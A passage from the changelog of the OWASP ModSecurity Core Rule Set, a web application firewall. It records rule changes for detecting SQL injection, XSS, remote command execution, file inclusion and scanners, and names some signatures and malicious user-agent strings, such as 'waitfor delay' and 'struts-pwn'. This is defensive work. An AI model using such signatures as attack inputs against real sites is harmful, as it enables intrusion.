DS_Store... (Jose Nazario) * Fix missing strings in 942410 (Franziska Bühler) * Add 2 missing PDO errors (Christoph Hansen) * Fix issues with FPs in regression tests (Chaim Sanders) * Add Nextcloud client exclusion support (Christoph Hansen) * Fix spelling mistakes in REQUEST-942- (Padraig Doran, Chaim Sanders) * Explicitly ignore the user defined rules (Aaron Haaf, Chaim Sanders) * Add regression tests for 942490 (Christoph Hansen, Chaim Sanders) * Add Owncloud client exclusion support (Christoph Hansen, Christian Folini) * Adding 'F-Secure Radar' vulnerability scanner UA (Christian Folini, Chaim Sanders) * Update DockerFile to use Ubuntu as base (Chaim Sanders) * False positives 942360: move alter and union (Franziska Bühler, Chaim Sanders) * Add support for Java style attacks (Manuel Spartan, Walter Hop) * Fix various regression tests issues caused by webserver handling (azhao155, Chaim Sanders) * Update TravisCI to build on a per PR basis (Chaim Sanders) * Optimized rule 921160 and regex (Allan Boll, Chaim Sanders) * Update the consistency across various files (Federico G. Schwindt) * Add missing transform, 944120 sibling 944240 (Manuel Spartan) * Fix false positive for 'like' in 942120 (Walter Hop) * Add regression tests for Java Rules (Manuel Spartan) * Fixup and small reorg of dokuwiki rule exclusion package (Christian Folini) * Make TravisCI tests fail if Apache can't load rules (Felipe Zipitría) * Add exclusion rules for Dokuwiki (Matt Bagley, Christian Folini) * Initial exclusions for NextCloud installs (Matt Bagley, Christian Folini) * Added struts-pwn UA to list (Manuel Spartan) * Uses MULTIPART_MISSING_SEMICOLON instead of MULTIPART_SEMICOLON_MISSING (Felipe Zimmerle) * Add file upload checks (Manuel Spartan) * Check if Transfer-Encoding is missing (Federico G. Schwindt, Christian Folini) * Remove duplicated variables (Federico G. Schwindt) * Reduce FP by splitting classic SQL injection rule 942370 (Christoph Hansen) * Fix typo in REQUEST-920-PROTOCOL-ENFORCEMENT (ihacku, Franziska Bühler) * Add configurable timestamp format to FTW integration (Christian Folini) * Add badges to README (Felipe Zipitría) * Add clarifying comments to 910110 (Christian Folini) * Making rule 933131 case-insensitive (Manuel Spartan) * Merge and reorder rules as part of cleanup (Federico G. Schwindt) * Update copyright date and syntax (Jose Nazario, Felipe Zipitría) * Updated SecMarker and SkipAfter names to use meet guidelines (Felipe Zipitría) * Tidy up single quotes and other guidelines updates (Felipe Zipitría) * Syntax fix for setvar crs_exclusions_wordpress (Manuel Spartan) * Updated various contributors to developers (Christian Folini) * Revise SQL rules by disassembling them into their core protections (Franziska Bühler) * Add an example payload to 920220 (coolt) * Add a missing regex to rule 942310 (Franziska Bühler) * Detect GET or HEAD with Transfer-Encoding header (Federico G. Schwindt) * Fix broken links in references (Pásztor Gábor) * Add contributing guidelines (Felipe Zipitría) * Fix processing bypasses in rule 931130 (Felipe Zipitría, Christian Folini) * Correct small omissions in unix-shell.data (Walter Hop) * Add IIS specific detection to LFI-os-files.data (Manuel Spartan) * Update examples to match the current cleanup (Federico G. Schwindt) * Corrected the ordering of actions to meet guidelines (Felipe Zipitría) * Remove unused capture groups (Federico G. Schwindt) * Use explicit rx operator (Federico G. Schwindt) * Update the RCE regular expressions(Walter Hop, Federico G. Schwindt) * Removing maturity & accuracy from rules (Felipe Zipitría) * Increasing range header (Christoph Hansen) * Fixed upgrade.py script argument options (Glyn Mooney) * Updating to reflect OWASP flagship status (Chaim Sanders) * Adding Docker support for CRS (Chaim Sanders) * Initial Travis deployment (Zack Allen, Walter Hop) * Initial commit of regression tests (Chaim Sanders, Walter Hop) * Remove test for 921170 because it won't ever fire (Chaim Sanders, Walter Hop) * Update minor incorrectness in asp.net regex (Chaim Sanders, Walter Hop) * Add notification for builds against #modsecurity on freenode (Zack Allen, Walter Hop) * Add all past code contributors and convert to markdown (Walter Hop) * Block uploads of files with .phps extension (Walter Hop) * Improve message for script upload with superfluous extension (Walter Hop) * Remove trailing whitespace in various regexs (Walter Hop) * Add command popd to direct unix rce list in rule 932150 (Franziska Bühler) * Remove unnecessary END_XSS_CHECKS marker (Christian Folini) * Ignore Whitespaces in Rule 942110 (Christoph Hansen) * Update missing RCE Commands (Umar Farook) * Update lfi-os-files.data (Umar Farook) * Removed deprecated t:removeComments from 942100 (Christian Folini) * Add word boundary to rule 942410 (Franziska Bühler) ## Version 3.0.2 - 2017-05-12 * Remove debug rule that popped up in 3.0.1 (Christian Folini) ## Version 3.0.1 - 2017-05-09 * SECURITY: Removed insecure handling of X-Forwarded-For header; reported by Christoph Hansen (Walter Hop) * Fixed documentation errors in RESPONSE-999-... (Chaim Sanders) * Reduced FPs on 942190 by adding a word boundary to regex (Franziska Bühler) * Reduced FPs on 932150 by removing keyword reset (Franziska Bühler) * Tidied exceptions in 930100 (Roberto Paprocki) * Reduced FPs for 920120 by splitting into stricter sibling (Franziska Bühler) * Simplified some Drupal rule exclusions (Damien McKenna, Christian Folini) * Extended KNOWN_BUGS with remarks on JSON support on Debian (Franziska Bühler) * Updated README to add gitter support (Chaim Sanders) * Clarified DoS documentation for static extensions (Roberto Paprocki) * Added application/octet-stream to allowed content types (Christian Folini) * Typo in 942220 alert message (Chaim Sanders, @bossloper) * Moved referrer check of 941100 into new PL2 rule (Franziska Bühler) * Closed multiple @pmf evasions via lowercase transformation (Roberto Paprocki) * Clarified libinjection bundling in INSTALL file (@cjdp) * Reduced FPs via Wordpress Rule Exclusions (Walter Hop) * Support for RFC 3902 (Content Type application/soap+xml; Christoph Hansen) Make sure you update ModSecurity recommended rule 200000 as well. * Bugfix in 942410 regex (Christian Folini) * Reduced FPs for 942360 (Walter Hop) * Reduced FPs for 941120 by restricting event handler names (Franziska Bühler) * Extended 931000 with scheme "file" to fix false negative (Federico Schwindt) * Extended 905100 and 905110 for HTTP/2.0 (includes bugfix, Christoph Hansen) * Moved 941150 from PL1 to PL2; includes Bugfix for rule (Christian Folini) * Updated documentation for 920260 (Chaim Sanders) * Bugfix in upgrade.py (Victor Hora) * Fixed FP in RCE rule 932140 (Walter Hop) * Fixed comment for arg limit check rule 920370 (Christian Folini) * Created CONTRIBUTORS file * Added Christoph Hansen (emphazer) to CONTRIBUTORS file * Added Franziska Bühler (Franziska Bühler) to CONTRIBUTORS file * Fixed bug with DoS rule 912160 (@loudly-soft, Christian Folini) ## Version 3.0.0 - 2016-11-10 Huge changeset running in separate branch from September 2013 to September 2016. This is a cursory summary of the most important changes: * Huge reduction of false positives (Ryan Barnett, Felipe Zimmerle, Chaim Sanders, Walter Hop, Christian Folini) * Anomaly scoring is the new default, renamed thresholds from tx.(in|out)bound_anomaly_score_level to tx.(in|out)bound_anomaly_score_threshold * Introduction of libinjection for SQLi detection * Introduction of libinjection for XSS detection * Big improvement on detection of Remote Command Execution (Walter Hop) * Big improvement on PHP function name detection (Walter Hop) * Paranoia Mode (Christian Folini, Noël Zindel, Franziska Bühler, Manuel Leos, Walter Hop) * Shifted dozens of rules into higher paranoia levels * Introduced a lot of stricter sibling rules in higher levels * Generic mechanism to support application specific rule exclusions (Chaim Sanders) * Initial Wordpress rule exclusions (Walter Hop) * Initial Drupal rule exclusions (Christian Folini, @emphazer) * Renumbering of rules. See folder id_renumbering for a csv map (Chaim Sanders) * Consolidation of rules, namely XSS and SQLi (Spider Labs/Trustwave team) * Sampling mode / Easing in (Christian Folini) * Cleanup of reputation checks / persistent blocking (Christian Folini / Walter Hop) * Tags much more systematic (Walter Hop) * IP reputation checks / persistent blocking of certain clients (Spider Labs/Trustwave team) * Phase actions use request/response/logging now instead of numerical phases (Spider Labs/Trustwave team) * Added NoScript XSS Filters (Spider Labs/Trustwave team) * Updated "severity" action to use words (CRITICAL, WARNING, etc...) vs. numbers (5, 4, etc..) * Various regex fixes after research by Vladimir Ivanov (Chaim Sanders) * Overhaul of the regression mode into debug mode (Walter Hop, Ryan Barnett) * Introduction of util/upgrade.py (Walter Hop) * Removal of GeoIP database. Download via util/upgrade.py now. * Introduction of Initialization rules with default values (Walter Hop, Christian Folini) * Sorting out terminology with whitelisting and rule exclusions (Christian Folini) * Overhaul of testing (Chaim Sanders) * Protection from HTTP Parameter Pollution (Franziska Bühler) * Simplification of setup config file, renamed file to crs-setup.conf.example * Improved session fixation detection logic (Christian Peron, credits to Eric Hodel for the discovery) * Updated list of malicious webscanners * Splitting scanner user agents data files (github user @ygrek) * Countless bugfixes in severities, anomaly scores, tags, etc. across the board * Cleanup of formerly experimental DDoS rules, fix documentation (Ryan Barnett, Christian Folini) * Improves http blacklist checks (Walter Hop) * Extended XSS detection (as suggested by Mazin Ahmed) * Added support for Travis CI * Added support for HTTP/2 in recent Apache 2.4 (Walter Hop) * Added many, many bots and scanners (among others suggested by github user @toby78, @jamuse, Matt Koch) * Fixed mime types suitable for XML processor (Chaim Sanders) * Include script in util/join-multiline-rules to work around Apache 2.4 < 2.4.11 bug with long lines (Walter Hop) * New detection for request smuggling attacks (Achim Hofmann, Christian Folini) * Fixes with project honeypot setup (Ryan Barnett) * Separated DB / SQL messages by DB software (Ryan Barnett) * CPanel integration (Chaim Sanders) * Introduction of var for static resources (Chaim Sanders) * Many improvements to rules in 2014/5 (Ryan Barnett) ## Version 2.2.9 - 2013-09-30 Improvements: * Updated the /util directory structure Bug Fixes: * fix 950901 - word boundary added * modsecurity_35_bad_robots.data - gecko/25 blocks Firefox Android ## Version 2.2.8 - 2013-06-30 Improvements: * Updatd the /util directory structure * Added scripts to check Rule ID duplicates * Added script to remove v2.7 actions so older ModSecurity rules will work * * Added new PHP rule (958977) to detect PHP exploits (Plesk 0-day from king cope) * * Bug Fixes: * fix 950901 - word boundary added * * fix regex error * * Updated the Regex in 981244 to include word boundaries * * Problem with Regression Test (Invalid use of backslash) - Rule 960911 - Test2 * * ModSecurity: No action id present within the rule - ignore_static.conf * * "Bad robots" rule blocks all Java applets on Windows XP machines * * duplicated rules id 981173 * ## Version 2.2.7 - 2012-12-19 Improvements: * Added JS Overrides file to identify successful XSS probes * Added new XSS Detection Rules from Ashar Javed () * * Updated the SQLi Filters to add in Oracle specific functions * Bug Fixes: * Fixed Session Hijacking rules * * Fixed bug in XSS rules checking TX:PM_XSS_SCORE variable ## Version 2.2.6 - 2012-09-14 Improvements: * Started rule formatting update for better readability * Added maturity and accuracy action data to each rule * Updated rule revision (rev) action * Added rule version (ver) action * Added more regression tests (util/regression_tests/) * Modified Rule ID 960342 to block large file attachments in phase:1 * Removed all PARANOID rule checks * Added new Session Fixation rules Bug Fixes: * Fixed missing ending double-quotes in XSS rules file * Moved SecDefaultAction setting from phase:2 to phase:1 * Fixed Session Hijacking SessionID Regex * Changed the variable listing for many generic attack rules to exclude REQUEST_FILENAME ## Version 2.2.5 - 2012-06-14 Security Fixes: * Updated the anomaly scoring value for rule ID 960000 to critical (Identified by Qualys Vulnerability & Malware Research Labs (VMRL)) () * Updated Content-Type check to fix possible evasion with @within (Identified by Qualys Vulnerability & Malware Research Labs (VMRL)) () Improvements: * Renamed main config file to modsecurity_crs_10_setup.conf * Updated the rule IDs to start from CRS reserved range: 900000 * Updated rule formatting for readability * Updated the CSRF rules to use UNIQUE_ID as the token source * Added the zap2modsec.pl script to the /util directory which converts OWASP ZAP Scanner XML data into ModSecurity Virtual Patches * Updated the Directory Traversal Signatures to include more obfuscated data * Added Arachni Scanner Integration Lua script/rules files Bug Fixes: * Added forceRequestBodyVariable action to rule ID 960904 ## Version 2.2.4 - 2012-03-14 Improvements: * Added Location and Set-Cookie checks to Response Splitting rule ID 950910 * Added a README file to the activated_rules directory * Consolidate a number of SQL Injection rules into optimized regexs * Removed multiMatch and replaceComments from SQL Injection rules * Updated the SQLi regexs for greediness * Updated the SQLi setvar anomaly score values to use macro expansion * Removed PARANOID mode rules Bug Fixes: * Fixed missing comma before severity action in rules 958291, 958230 and 958231 * Fixed duplidate rule IDs ## Version 2.2.3 - 2011-12-19 Improvements: * Added Watcher Cookie Checks to optional_rules/modsecurity_crs_55_appication_defects.conf file * Added Watcher Charset Checks to optional_rules/modsecurity_crs_55_application_defects.conf file * Added Watcher Header Checks to optional_rules/modsecurity_crs_55_application_defects.conf file Bug Fixes: * Fixed Content-Type evasion issue by adding ctl:forceRequestBodyVariable action to rule ID 960010. (Identified by Andrew Wilson of Trustwave SpiderLabs). * Updated the regex and added tags for RFI rules. ## Version 2.2.2 - 2011-09-28 Improvements: * Updated the AppSensor Profiling (to use Lua scripts) for Request Exceptions Detection Points * Added new Range header detection checks to prevent Apache DoS * Added new Security Scanner User-Agent strings * Added example script to the /util directory to convert Arachni DAST scanner XML data into ModSecurity virtual patching rules. * Updated the SQLi Character Anomaly Detection Rules * Added Host header info to the RESOURCE collection key for AppSensor profiling rules Bug Fixes: * Fixed action list for XSS rules (replaced pass,nolog,auditlog with block) * Fixed Request Limit rules by removing & from variables * Fixed Session Hijacking IP/UA hash captures * Updated the SQLi regex for rule ID 981242 ## Version 2.2.1 - 2011-07-20 Improvements: * Extensive SQL Injection signature updates as a result of the SQLi Challenge * Updated the SQL Error message detection in response bodies * Updated SQL Injection signatures to include more DB functions * Updated the WEAK SQL Injection signatures * Added tag AppSensor/RE8 to rule ID 960018 Bug Fixes: * Fixed Bad Robot logic for rule ID 990012 to further qualify User-Agent matches * Fixed Session Hijacking rules to properly capture IP address network hashes. * Added the multiMatch action to the SQLi rules * Fixed a false negative logic flaw within the advanced_filter_converter.lua script * Fixed missing : in id action in DoS ruleset. * Updated rule ID 971150 signature to remove ; ## Version 2.2.0 - 2011-05-26 Improvements: * Changed Licensing from GPLv2 to Apache Software License v2 (ASLv2) * Created new INSTALL file outlining quick config setup * Added a new rule regression testing framework to the /util directory * Added new activated_rules directory which will allow users to place symlinks pointing to files they want to run. This allows for easier Apache Include wild-carding * Adding in new RULE_MATURITY and RULE_ACCURACY tags * Adding in a check for X-Forwarded-For source IP when creating IP collection * Added new Application Defect checks (55 app defect file) from Watcher tool (Check Charset) * Added new AppSensor rules to experimental_dir * Added new Generic Malicious JS checks in outbound content * Added experimental IP Forensic rules to gather Client hostname/whois info * Added support for Mozilla's Content Security Policy (CSP) to the experimental_rules * Global collection in the 10 file now uses the Host Request Header as the collection key. This allows for per-site global collections. * Added new SpiderLabs Research (SLR) rules directory (slr_rules) for known vulnerabilities. This includes both converted web rules from Emerging Threats (ET) and from SLR Team. * Added new SLR rule packs for known application vulns for WordPress, Joomla and phpBB * Added experimental rules for detecting Open Proxy Abuse * Added experimental Passive Vulnerability Scanning ruleset using OSVDB and Lua API * Added additional URI Request Validation rule to the 20 protocol violations file (Rule ID - 981227) * Added new SQLi detection rules (959070, 959071 and 959072) * Added "Toata dragostea mea pentru diavola" to the malicious User-Agent data Bug Fixes: * Assigned IDs to all active SecRules/SecActions * Removed rule inversion (!) from rule ID 960902 * Fixed false negative issue in Response Splitting Rule * Fixed false negative issue with @validateByteRange check * Updated the TARGETS listing for rule ID 950908 * Updated TX data for REQBODY processing * Changed the pass action to block in the RFI rules in the 40 generic file * Updated RFI regex to catch IP address usage in hostname * Changed REQUEST_URI_RAW variable to REQUEST_LINE in SLR rules to allow matches on request methods. * Updated the RFI rules in the 40 generic attacks conf file to remove explicit logging actions. They will now inherit the settings from the SecDefaultAction ## Version 2.1.2 - 2011-02-17 Improvements: * Added experimental real-time application profiling ruleset. * Added experimental Lua script for profiling the # of page scripts, iframes, etc.. which will help to identify successful XSS attacks and planting of malware links. * Added new CSRF detection rule which will trigger if a subsequent request comes too quickly (need to use the Ignore Static Content rules). Bug Fixes: * Added missing " in the skipAfter SecAction in the CC Detection rule set ## Version 2.1.1 - 2010-12-30 Bug Fixes: * Updated the 10 config conf file to add in pass action to User-Agent rule * Updated the CSRF ruleset to conditionally do content injection - if the csrf token was created by the session hijacking conf file * Updated the session hijacking conf file to only enforce rules if a SessionID Cookie was submitted * Fixed macro expansion setvar bug in the restricted file extension rule * Moved the comment spam data file into the optional_rules directory ## Version 2.1.0 - 2010-12-29 Improvements: * Added Experimental Lua Converter script to normalize payloads. Based on PHPIDS Converter code and it used with the advanced filters conf file. * Changed the name of PHPIDS converted rules to Advanced Filters * Added Ignore Static Content (Performance enhancement) rule set * Added XML Enabler (Web Services) rule set which will parse XML data * Added Authorized Vulnerability Scanning (AVS) Whitelist rule set * Added Denial of Service (DoS) Protection rule set * Added Slow HTTP DoS (Connection Consumption) Protection rule set * Added Brute Force Attack Protection rule set * Added Session Hijacking Detection rule set * Added Username Tracking rule set * Added Authentication Tracking rule set * Added Anti-Virus Scanning of File Attachments rule set * Added AV Scanning program to /util directory * Added Credit Card Usage Tracking/Leakage Prevention rule set * Added experimental CC Track/PAN Leakage Prevention rule set * Added an experimental_rules directory to hold new BETA rules * Moved the local exceptions conf file back into base_rules directory however it has a ".example" extension to prevent overwriting customized versions when upgrading * Separated out HTTP Parameter Pollution and Restricted Character Anomaly Detection rules to the experimental_rules directory * Adding the REQUEST_HEADERS:User-Agent macro data to the initcol in 10 config file, which will help to make collections a bit more unique ## Version 2.0.10 - 2010-11-29 Improvements: * Commented out the Anomaly Scoring Blocking Mode TX variable since, by default, the CRS is running in traditional mode. Bug Fixes: * Moved all skipAfter actions in chained rules to chain starter SecRules * Changed phases on several rules in the 20 protocol anomaly rules file to phase:1 to avoid FNs ## Version 2.0.9 - 2010-11-17 Improvements: * Changed the name of the main config file to modsecurity_crs_10_config.conf.example so that it will not overwrite existing config settings. Users should rename this file to activate it. * Traditional detection mode is now the current default * Users can now more easily toggle between traditional/standard mode vs. anomaly scoring mode by editing the modsecurity_crs_10_config.conf file * Updated the disruptive actions in most rules to use "block" action instead of "pass". This is to allow for the toggling between traditional vs. anomaly scoring modes. * Removed logging actions from most rules so that it can be controlled from the SecDefaultAction setting in the modsecurity_crs_10_config.conf file * Updated the anomaly scores in the modsecurity_crs_10_config.conf file to more closely match what is used in the PHPIDS rules. These still have the same factor of severity even though the numbers themselves are smaller. * Updated the 49 and 59 blocking rules to include the matched logdata * Updated the TAG data to further classify attack/vuln categories. * Updated the SQL Injection filters to detect more boolean logic attacks * Moved some files to optional_rules directory (phpids, Emerging Threats rules) Bug Fixes: * Fixed Rule ID 960023 in optional_rules/modsecurity_crs_40_experimental.conf is missing 1 single quote * Moved all skipAfter actions in chained rules to the rule starter line (must have ModSec v2.5.13 or higher) * Fixed restricted file extension bug with macro expansion * Updated the SQLI TX variable macro expansion data in the 49 and 60 files so that it matches what is being set in the sql injection conf file * Fixed typo in SQL Injection regexs - missing backslash for word boundary (b) ## Version 2.0.8 - 2010-08-27 Improvements: * Updated the PHPIDS filters * Updated the SQL Injection filters to detect boolean attacks (1<2, foo == bar, etc..) * Updated the SQL Injection filters to account for different quotes * Added UTF-8 encoding validation support to the modsecurity_crs_10_config.conf file * Added Rule ID 950109 to detect multiple URL encodings * Added two experimental rules to detect anomalous use of special characters Bug Fixes: * Fixed Encoding Detection RegEx (950107 and 950108) * Fixed rules-updater.pl script to better handle whitespace * Fixed missing pass action bug in modsecurity_crs_21_protocol_anomalies.conf * Fixed the anomaly scoring in the modsecurity_crs_41_phpids_filters.conf file * Updated XSS rule id 958001 to improve the .cookie regex to reduce false positives ## Version 2.0.7 - 2010-06-04 Improvements: * Added CSRF Protection Ruleset which will use Content Injection to add javascript to specific outbound data and then validate the csrf token on subsequent requests. * Added new Application Defect Ruleset which will identify/fix missing HTTPOnly cookie flags * Added Experimental XSS/Missing Output Escaping Ruleset which looks for user supplied data being echoed back to user unchanged. * Added rules-updater.pl script and configuration file to allow users to automatically download CRS rules from the CRS rules repository. * Added new SQLi keyword for ciel() and reverse() functions. * Updated the PHPIDS filters Bug Fixes: * Fixed false positives for Request Header Name matching in the 30 file by adding boundary characters. * Added missing pass actions to @pmFromFile prequalifier rules * Added backslash to SQLi regex * Fixed hard coded anomaly score in PHPIDS filter file * Fixed restricted_extension false positive by adding boundary characters ## Version 2.0.6 - 2010-02-26 Bug Fixes: * Added missing transformation functions to SQLi rules. * Fixed duplicate rule IDs. * Fixed typo in @pmFromFile in the Comment SPAM rules * Added macro expansion to Restricted Headers rule * Fixed misspelled SecMarker * Fixed missing chain action in Content-Type header check * Update phpids filters to use pass action instead of block ## Version 2.0.5 - 2010-02-01 Improvements: * Removed previous 10 config files as they may conflict with local customized Mod configs. * Added a new 10 config file that allows the user to globally set TX variables to turn on/off PARANOID_MODE inspection, set anomaly score levels and http policies. Must have ModSecurity 2.5.12 to use the macro expansion in numeric operators. * Added Rule Logic and Reference links to rules descriptions. * Added Rule IDs to all rules. * Added tag data mapping to new OWASP Top 10 and AppSensor Projects, WASC Threat Classification * Removed Apache limit directives from the 23 file * Added macro expansion to 23 file checks. * Added @pmFromFile check to 35 bad robots file * Added malicious UA strings to 35 bad robots check * Created an experimental rules file * Updated HTTP Parameter Pollution (HPP) rule logic to concat data into a TX variable for inspection * Removed TX inspections for generic attacks and reverted to standard ARGS inspection * Updated the variable list for standard inspections (ARGS|ARGS_NAMES|XML:/*) and moved the other variables to the PARANOID list (REQUEST_URI|REQUEST_BODY|REQUEST_HEADERS|TX:HPP_DATA) * Moved converted ET Snort rules to the /optional_rules directory * Created a new Header Tagging ruleset (optional_rules) that will add matched rule data to the request headers. * Updated Inbound blocking conf file to use macro expansion from the 10 config file settings * Added separate anomaly scores for inbound, outbound and total to be evaluated for blocking. * Updated the regex logic in the (1=1) rule to factor in quotes and other logical operators. * Updated the SPAMMER RBL check rules logic to only check once per IP/Day. * Added new outbound malware link detection rules. * Added PHP "call_user_func" to blacklist Identified by SOGETI ESEC R&D Bug Fixes: * Removed Non-numeric Rule IDs * Updated the variable list on SQLi rules. * Fixed outbound @pmFromFile action from allow to skipAfter to allow for outbound anomaly scoring and blocking ## Version 2.0.4 - 2009-11-30 Improvements: * Updated converted PHPIDS signatures () * Updated PHPIDS rules logic to first search for payloads in ARGS and then if there is no match found then search more generically in request_body|request_uri_raw * Updated PHPIDS rules logic to only set TX variables and to not log. This allows for more clean exceptions in the 48 file which can then expire/delete false positive TX matches and adjust the anomaly scores. These rules will then inspect for any TX variables in phase:5 and create appropriate alerts for any variable matches that exist. Bug Fixes: * Added Anomaly Score check to the 60 correlation file to recheck the anomaly score at the end of phase:4 which would allow for blocking based on information leakage issues. ## Version 2.0.3 - 2009-11-05 Improvements: * Updated converted PHPIDS signatures () * Create a new PHPIDS Converter rules file () * Added new rules to identify multipart/form-data bypass attempts * Increased anomaly scoring (+100) for REQBODY_PROCESSOR_ERROR alerts Bug Fixes: * Added t:urlDecodeUni transformation function to phpids rules to fix both false positives/negatives * Added new variable locations to the phpids filters * Use of transformation functions can cause false negatives - added multiMatch action to phpids rules * Fixed multipart parsing evasion issues by adding strict parsing rules * Fixed typo in xss rules (missing |) * Fixed regex text in IE8 XSS filters (changed to lowercase) ## Version 2.0.2 - 2009-09-11 Improvements: * Added converted PHPIDS signatures () Bug Fixes: * Rule 958297 - Fixed Comment SPAM UA false positive that triggered only on mozilla. ## Version 2.0.1 - 2009-08-07 Improvements: * Updated the transformation functions used in the XSS/SQLi rules to improve performance * Updated the variable/target list in the XSS rules * Added XSS Filters from IE8 Bug Fixes: * Rule 958297 - Fixed unescaped double-quote issue in Comment SPAM UA rule. ## Version 2.0.0 - 2009-07-29 New Rules & Features: * Fine Grained Policy The rules have been split to having one signature per rule instead of having all signatures combined into one optimized regular expression. This should allow you to modify/disable events based on specific patterns instead of having to deal with the whole rule. * Converted Snort Rules Emerging Threat web attack rules have been converted. * Anomaly Scoring Mode Option The rules have been updated to include anomaly scoring variables which allow you to evaluate the score at the end of phase:2 and phase:5 and decide on what logging and disruptive actions to take based on the score. * Correlated Events There are rules in phase:5 that will provide some correlation between inbound events and outbound events and will provide a result of successful atttack or attempted attack. * Updated Severity Ratings The severity ratings in the rules have been updated to the following: * 0: Emergency - is generated from correlation where there is an inbound attack and an outbound leakage. * 1: Alert - is generated from correlation where there is an inbound attack and an outbound application level error. * 2: Critical - is the highest severity level possible without correlation. It is normally generated by the web attack rules (40 level files). * 3: Error - is generated mostly from outbound leakabe rules (50 level files). * 4: Warning - is generated by malicious client rules (35 level files). * 5: Notice - is generated by the Protocol policy and anomaly files. * 6: Info - is generated by the search engine clients (55 marketing file). * Updated Comment SPAM Protections Updated rules to include RBL lookups and client fingerprinting concepts from Bad Behavior () * Creation of Global Collection Automatically create a Global collection in the _10_ config file. Other rules can then access it. * Use of Block Action Updated the rules to use the "block" action. This allows the Admin to globally set the desired block action once with SecDefaultAction in the _10_ config file rather than having to edit the disruptive actions in all of the rules or for the need to have multiple versions of the rules (blocking vs. non-blocking). * "Possible HTTP Parameter Pollution Attack: Multiple Parameters with the same Name." * Added new generic RFI detection rules. * "Possibly malicious iframe tag in output" (Rules 981001,981002) Planting invisible iframes in a site can be used by attackers to point users from the victim site to their malicious site. This is actually as if the user was visiting the attacker's site himself, causing the user's browser to process the content in the attacker's site. New Events: * Rule 960019 - Expect Header Not Allowed. * Rule 960020 - Pragma Header Requires Cache-Control Header * Rule 958290 - Invalid Character in Request - Browsers should not send the (#) character as it is reserved for use as a fragment identifier within the html page. * Rule 958291 - Range: field exists and begins with 0. * Rule 958292 - Invalid Request Header Found. * Rule 958293 - Lowercase Via Request Header Found. * Rule 958294 - Common SPAM Proxies found in Via Request Header. * Rule 958295 - Multiple/Conflicting Connection Header Data Found. * Rule 958296 - Request Indicates a SPAM client accessed the Site. * Rule 958297 - Common SPAM/Email Harvester crawler. * Rule 958298 - Common SPAM/Email Harvester crawler Bug Fixes: * Rule 950107 - Split the rule into 2 separate rules to factor in the Content-Type when inspecting the REQUEST_BODY variable. * Rule 960017 - Bug fix for when having port in the host header. * Rule 960014 - Bug fix to correlate the SERVER_NAME variable. * Rule 950801 - Increased the logic so that the rule will only run if the web site uses UTF-8 Encoding. * Rules 999210,999211 - Bug fix to move ctl actions to last rule, add OPTIONS and allow the IPv6 loopback address * Rule 950117 - Updated the RFI logic to factor in both a trailing "?" in the ARG and to identify offsite hosts by comparing the ARG URI to the Host header. Due to this rule now being stronger, moved it from optional tight security rule to _40_ generic attacks file. Other Fixes: * Added more HTTP Protocol violations to _20_ file. * Set the SecDefaultAction in the _10_ config file to log/pass (This was the default setting, however this sets it explicitly. * Added SecResponseBodyLimitAction ProcessPartial to the _10_ config file. This was added so that when running the SecRuleEngine in DetectionOnly mode, it will not deny response bodies that go over the size restrictions. * Changed SecServerSignature to "Apache/1.3.28" * Fixed the use of SkipAfter and SecMarkers to make it consistent. Now have BEGIN and END SecMarkers for rule groups to more accurately allow moving to proper locations. * Fixed the @pm/@pmFromFile pre-qualifier logic to allow for operator inversion. This removes the need for some SecAction/SkipAfter rules. * Updated rule formatting to easily show rule containers (SecMarkers, pre-qualifier rules and chained rules). ## Version 1.6.1 - 2008-04-22 * Fixed a bug where phases and transformations where not specified explicitly in rules. The issue affected a significant number of rules, and we strongly recommend to upgrade. ## Version 1.6.0 - 2008-02-19 New Rulesets & Features: * 42 - Tight Security This ruleset contains currently 2 rules which are considered highly prone to FPs. They take care of Path Traversal attacks, and RFI attacks. This ruleset is included in the optional_rulesets dir * 42 - Comment Spam Comment Spam is used by the spammers to increase their rating in search engines by posting links to their site in other sites that allow posting of comments and messages. The rules in this ruleset will work against that. (Requires ModSecurity 2.5) * Tags A single type of attack is often detected by multiple rules. The new alert classification tags solve this issue by providing an alternative alert type indication and can serve for filtering and analysis of audit logs. The classification tags are hierarchical with slashes separating levels. Usually there are two levels with the top level describing the alert group and the lower level denoting the alert type itself, for example: WEB_ATTACK/SQL_INJECTION. False Positives Fixes: * Rule 960903 - Moved to phase 4 instead of 5 to avoid FPs * Rule 950107 - Will look for invalid url decoding in variables that are not automatically url decoded Additional rules logic: * Using the new "logdata" action for logging the matched signature in rules * When logging an event once, init the collection only if the alert needs to log * Using the new operator @pm as a qualifier before large rules to enhance performance (Requires ModSecurity 2.5) * SQL injection - A smarter regexp is used to detect 1=1,2=2,etc.. and not only 1=1. (Thanks to Marc Stern for the idea) * New XSS signatures - iframe & flash XSS ## Version 1.5.1 - 2007-12-06 False Positives Fixes: * Protocol Anomalies (file 21) - exception for Apache SSL pinger (Request: GET /) New Events: * 960019 - Detect HTTP/0.9 Requests HTTP/0.9 request are not common these days. This rule will log by default, and block in the blocking version of file 21 Other Fixes: * File 40, Rules 950004,950005 - Repaired the correction for the double url decoding problem * File 55 contained empty regular expressions. Fixed. ## Version 1.5 - 2007-11-23 New Rulesets: * 23 - Request Limits "Judging by appearances". This rulesets contains rules blocking based on the size of the request, for example, a request with too many arguments will be denied. Default policy changes: * XML protection off by default * BLOCKING dir renamed to optional_rules * Ruleset 55 (marketing) is now optional (added to the optional_rules dir) * Ruleset 21 - The exception for apache internal monitor will not log anymore New Events: * 960912 - Invalid request body Malformed content will not be parsed by modsecurity, but still there might be applications that will parse it, ignoring the errors. * 960913 - Invalid Request Will trigger a security event when request was rejected by apache with code 400, without going through ModSecurity rules. Additional rules logic: * 950001 - New signature: delete from * 950007 - New signature: waitfor delay False Positives Fixes: * 950006 - Will not be looking for /cc pattern in User-Agent header * 950002 - "Internet Explorer" signature removed * Double decoding bug used to cause FPs. Some of the parameters are already url-decoded by apache. This caused FPs when the rule performed another url-decoding transformation. The rules have been split so that parameters already decoded by apache will not be decoded by the rules anymore. * 960911 - Expression is much more permissive now * 950801 - Commented out entirely. NOTE: If your system uses UTF8 encoding, then you should uncomment this rule (in file 20) version 1.4.3 - 2007-07-21 New Events: * 950012 - HTTP Request Smuggling For more info on this attack: * 960912 - Invalid request body Malformed content will not be parsed by modsecurity, but still there might be applications that will parse it, ignoring the errors. * 960913 - Invalid Request Will trigger a security event when request was rejected by apache with code 400, without going through ModSecurity rules. False Positives Fixes: * 950107 - Will allow a % sign in the middle of a string as well * 960911 - A more accurate expression based on the rfc: * 950015 - Will not look for http/ pattern in the request headers Additional rules logic: * Since Apache applies scope directives only after ModSecurity phase 1 this directives cannot be used to exclude phase 1 